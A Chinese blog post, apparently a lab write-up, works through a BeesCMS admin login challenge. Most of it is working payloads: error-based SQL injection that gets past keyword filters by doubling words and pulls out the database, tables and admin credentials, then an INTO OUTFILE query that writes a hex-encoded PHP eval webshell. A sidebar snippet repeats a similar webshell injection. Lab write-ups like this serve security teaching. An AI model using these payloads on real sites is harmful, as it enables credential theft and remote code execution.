BeesCMS系统漏洞分析

已于 2022-10-02 10:49:38 修改
阅读量2.2k 收藏 13
点赞数 3
分类专栏: cms题 文章标签: 安全 web安全 数据库
于 2022-09-25 13:16:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47493074/article/details/127036497
版权

墨者学院
在这里插入图片描述
漏洞复现
进入首页,看到没什么问题,用kail字典birb扫下路径(发现管理页面)
在这里插入图片描述
看到输入框,尝试sql注入,发现有注入漏洞
在这里插入图片描述
既然存在报错信息,我们就尝试报错注入,经过尝试and也被过滤了,and用an and d代替,union用un union ion代替,select用selselectect代替:

报错注入

admin' an and d extractvalue(1,concat(0x7e,(select database()),0x7e))#

爆出数据库名为dees
在这里插入图片描述

爆表名:
发现from、where、=也被过滤了,等号用like代替

admin’ an and d extractvalue(1,concat(0x7e,(selselectect table_name fro from m information_schema.tables wh where ere table_schema like ‘dees’ limit 0,1),0x7e))#

在这里插入图片描述

爆字段

admin' an and d extractvalue(1,concat(0x7e,(selselectect column_name fro from m information_schema.columns wh where ere table_name like 'bees_admin' limit 1,1),0x7e))#

在这里插入图片描述
修改为limit 2,1
在这里插入图片描述

爆值

admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_name fro from m bees_admin limit 0,1),0x7e))#

在这里插入图片描述

admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_password fro from m bees_admin limit 0,1),0x7e))#

在这里插入图片描述
md5解密出来admin。

进入后发现没有什么可以动的东西,想起提示网站位于"/var/www/html/"目录下。

上传木马

那么都不用拿到账号密码了。。。。

user=admin' un union ion selselectect 1,2,3,4,5 i into nto outoutfilefile '/var/www/html/shell.php&password=1&code=abd5&submit=true&submit.x=60&submit.y=23

在这里插入图片描述
测试文件上传可

下面直接写入一句话木马:

user=admin' un union ion selselectect 1,<?php @eval($_REQUEST['ABC']);?>,3,4,5 i into nto outoutfilefile '/var/www/html/1.php'&password=12&code=f333&submit=true&submit.x=49&submit.y=30

发现并没有<>被过滤了
在这里插入图片描述
转成16进制

user=admin' un union ion selselectect 1,0x3c3f70687020406576616c28245f524551554553545b27414243275d293b3f3e,3,4,5 i into nto outoutfilefile
'/var/www/html/123.php'#&password=12&code=f333&submit=true&submit.x=49&submit.y=30

连接成功
在这里插入图片描述

Yolo山药
关注
  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BEESCMS企业网站管理系统 4.0
04-30
BEESCMS企业网站管理系统,SEO优化更快,无功能限制,后台上手容易,各类行业模板供选择使用!全面支持手机网站,电脑手机模板标签全部通用,一个后台管理,电脑、手机网站同步更新。BEESCMS企业网站管理系统 4.0 更新日志:2016-05-25修复:留言本内容截取问题;程序:去除HTML生成,更改为伪静态;程序:增加手机版本,标签、模板和电脑版一样;程序:优化一部分后台功能;模板:新增默认手机模板;修复:其它一些BUG。
besscms开源框架v3.4文件上传漏洞绕过&小迪安全第51天代码审计
qq_63855540的博客
10-01 437
besscms开源框架v3.4文件上传漏洞绕过&小迪安全第51天代码审计
360众测靶场题库之1-BeesCMS系统漏洞
zjl12344的博客
03-03 5289
360众测靶场题库
SQL注入讲解-BeesCMS系统漏洞分析溯源
Ryongao
02-06 887
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
BeesCMS的SQL注入漏洞
Ms08067安全实验室
08-06 3359
本文作者:arakh(MS08067实验室Web安全攻防知识星球学员)根据星球布置作业,完成BeesCMS的SQL注入漏洞过程如下:1. 扫描后台 获得后台登陆地址:2. 登陆后台...
BeesCMS4.0多处漏洞复现
1匹黑马
04-20 7945
文章目录前言漏洞复现后台报错注入 前言 本次复现的漏洞有: 后台报错注入漏洞 文件上传漏洞 变量覆盖漏洞 Beescms v4.0由于后台登录设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入、文件上传、变量覆盖漏洞。现在依然有许多企业选用BeesCMS4.0,百度搜powerd by BEESCMS © 2010-2015 www.beescms.com 还是有很多站的: ...
[代码审计] beecms 4.0 漏洞总结
shawdow_bug的博客
09-24 4280
beecms漏洞
beescms网站渗透测试和修复意见
TKXS
12-27 5350
beescms网站渗透测试 目录 1.环境搭建 2.渗透前信息收集 3.开始渗透 Beescms实验环境搭建 1、官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html 2、解压压缩文件,然后把文件放到phpstudy的网站根目录 3、浏览器访问http://127.0.0.1/beescms/install,开始安装 4、一直下一步,出现如下界面,输入数据库账户密码 5、成功安装 6、修改mysql.ini 文件,在mysqld 下添加条目: secu
内部靶场系列|BeesCms
白帽子凯哥聊黑客
05-30 700
校验上传文件的content-type字段,如果content-type字段是允许上传的类型,则上传成功,否则上传失败。所以这里我们只要在数据包中修改content-type字段,就可以绕过上传校验,上传webshell。审计代码得知,该靶场的Content-Type白名单是image/gif。,只是这靶场我把Content-Type白名单限定到只有一个。修改Content-Type白名单为 image/gif。1、 弱口令进入系统后台,文件上传。1、 使用弱口令登录进后台。2、 文件上传点的逻辑。
【beescms】命令执行、报错注入
qq_51979295的博客
09-28 487
pwn的题死活下载不下来,今天写点别的,还有点别的洞没写,改天补上
BEESCMS靶场小记
I_WORM的博客
01-17 571
进入网站首页,url后面通过输入admin发现了后台管理系统的登录界面。用弱口令admin admin 直接进去了;(可以看到一些系统信息)从图片管理位置可以查看上传的原图;可以看到上传了一个php文件;对文件进行上传(上传一个hello.php文件)不要勾选缩略图。通过查看里面的数据发现了一个文件上传点。通过抓包对MIME类型进行修改上传成功。复制图片的链接访问成功执行。
BEESCMS企业网站管理系统 3.4.rar
05-27
BEESCMS企业网站管理系统拥有简单方便的模板标签,能够快速做出模板;自定义表单,自定义模型,内置新闻、下载、产品、招聘、单页模型;SEO功 能,每个页面都可以单独SEO优化;多语言,多风格,每种语言每个页面都可以定义风格;html静态页面生成功能;BEES还可以自定义flash引导页。BEES企业网站管理系统是一个基于PHP Mysql架构的企业网站管理系统。BEES采用模块化方式开发,功能强大灵活易于扩展,并且完全开放源代码,多种语言分站,为企业网站建设和外贸提供解决方案。 BEESCMS企业网站管理系统 3.4 更新内容:2014-04-09 修复:后台内容列表删除没反应的问题 程序:表单增加验证码 程序:默认增加一个反馈表单 程序:搜索功能更改为只搜索产品内容 模板:更改默认模板风格 主要特性: 文章/产品等多内容 拥有文章、产品、下载、招聘、订单等企业网站内容模型,同时还可以自定义内容模型。 在线QQ/旺旺等营销客服 可以添加企业QQ、淘宝、阿里巴巴、MSN等多种客服,采用分组管理,一次添加多次使用 多语言外贸/多语言内容同时发布 可以自定义多种语言,使用不同的风格,内容可以同时发布到企业网站各类语言中。 多图上传/图文发布 同时上传多张企业产品图片,分类管理图片,一次上传多次使用,可视化编辑,排版更容易。 seo优化/生成静态html页面 后台seo功能,可以优化到产品图片。全站生成html页面,并且可以自定义生成的页面名称 模板/友情链接/留言/反馈/会员等多系统 模板和程序完全分离,后台可以直接修改管理模板。多种内置系统完全满足企业需求。
beescms总结
02-29
自己beescms二次开发时总结的相关问题还有一些自己写的方法分享给大家,希望对大家有帮助.
BEESCMS企业网站管理系统.7z
03-15
BEESCMS企业网站管理系统.7z
BEESCMS企业网站管理系统 v3.3
05-17
BEESCMS企业网站管理系统拥有简单方便的模板标签,能够快速做出模板;自定义表单,自定义模型,内置新闻、下载、产品、招聘、单页模型;SEO功 能,每个页面都可以单独SEO优化;多语言,多风格,每种语言每个页面都可以定义风格;html静态页面生成功能;BEES还可以自定义flash引导页。BEES企业网站管理系统是一个基于PHP+Mysql架构的企业网站管理系统。BEES采用模块化方式开发,功能强大灵活易于扩展,并且完全开放源代码,多种语言分站,为企业网站建设和外贸提供解决方案。 V3.3_R_20131010 后台操作:更改后台界面及其一些操作 后台操作:副标题默认获取主标题的内容 后
BeesCMS系统漏洞分析溯源
qq_36933272的博客
09-04 1257
输入admin/login.jsp进入登陆页面 判断存在sql注入漏洞 在用户名注入一句话木马,需要把php一句话木马转为十六进制1’ uni union on selselectect 0x3c3f706870406576616c28245f706f73745b315d293f3e ,2,3,4,5 in into outoutfilefile ‘/var/www/html/muma.php...
【代码审计】小白友好的根据CNVD审计BEESCMS
uuzeray的博客
01-29 1486
我们就用刚上传的一句话木马试一下:upload/img/20121208/201212082353104864.php。看起来有很多,但不少include的参数已经写死了,这些我们就不用看,我们需要找可控变量。访问一下/admin/admin_channel.php。找到/admin/admin_channel.php。访问/admin/admin_pic.php。回到/admin/admin_pic.php。直接用第一个/admin_ajax.php。跟一下$value,发现是全局且可控的。
BeesCMS系统漏洞分析溯源(墨者学院)
weixin_44300286的博客
05-13 1247
0x01、信息收集 拿到网站,先扫描目录,发现有后台登录界面 尝试登录,发现弱口令admin/admin成功进入后台 找到上传文件的地方准备文件上传 但是多次尝试都未能成功,就算普通图片也没法上传 0x02、sql注入 后来发现在登录界面有sql注入 经过尝试发现过滤了一些关键字 user=admin' uni union on seselectlect updatexml('1',concat('~',(seselectlect database())),'1')#&password=123
sql注入漏洞的渗透思路
最新发布
03-21
SQL注入漏洞是一种常见的网络安全漏洞,攻击者可以通过该漏洞执行恶意的SQL语句,从而获取、修改或删除数据库中的数据。下面是一种常见的SQL注入渗透思路: 1. 收集目标信息:了解目标网站的结构和使用的数据库类型,例如MySQL、Oracle等。 2. 探测注入点:通过输入一些特殊字符(如单引号、双引号、分号等)来测试是否存在注入点。如果网站没有对用户输入进行充分的过滤和验证,可能会出现注入点。 3. 判断注入类型:根据不同的注入点类型,采用相应的注入方式。常见的注入类型包括:布尔型注入、报错型注入、时间延迟型注入等。 4. 获取数据库信息:通过注入语句获取数据库的相关信息,如数据库版本、表名、列名等。可以使用UNION SELECT语句、ORDER BY语句等来获取数据。 5. 执行恶意操作:根据获取到的数据库信息,可以执行一些恶意操作,如修改、删除或添加数据。但在进行这些操作之前,请务必确保已经取得合法授权。 6. 防御措施:为了防止SQL注入漏洞,开发人员应该对用户输入进行严格的过滤和验证,使用参数化查询或预编译语句,避免直接拼接SQL语句。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值